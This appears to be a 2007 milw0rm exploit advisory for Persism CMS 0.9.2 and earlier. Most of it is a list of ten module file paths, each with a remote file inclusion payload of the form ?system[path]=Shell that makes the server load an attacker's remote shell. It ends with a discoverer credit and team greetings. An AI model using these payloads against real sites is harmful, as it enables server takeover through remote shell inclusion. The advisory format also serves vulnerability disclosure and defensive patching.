# Persism Content Management System <= 0.9.2 Multiple Remote File Inclusion Vulnerabilities # D.Script: http://www.persism.com/emil/0.9.2/0.9.2.tar.gz # Discovered by: GolD_M = [Mahmood_ali] # Homepage: http://www.Tryag.cc # Exploit:[Path]/modules/blocks/headerfile.php?system[path]=Shell # Exploit:[Path]/modules/files/blocks/latest_files.php?system[path]=Shell # Exploit:[Path]/modules/filters/headerfile.php?system[path]=shell # Exploit:[Path]/modules/forums/blocks/latest_posts.php?system[path]=shell # Exploit:[Path]/modules/groups/headerfile.php?system[path]=shell # Exploit:[Path]/modules/links/blocks/links.php?system[path]=shell # Exploit:[Path]/modules/menu/headerfile.php?system[path]=shell # Exploit:[Path]/modules/news/blocks/latest_news.php?system[path]=shell # Exploit:[Path]/modules/settings/headerfile.php?system[path]=shell # Exploit:[Path]/modules/users/headerfile.php?system[path]=shell # Greetz To: Tryag-Team ....## # milw0rm.com [2007-05-04]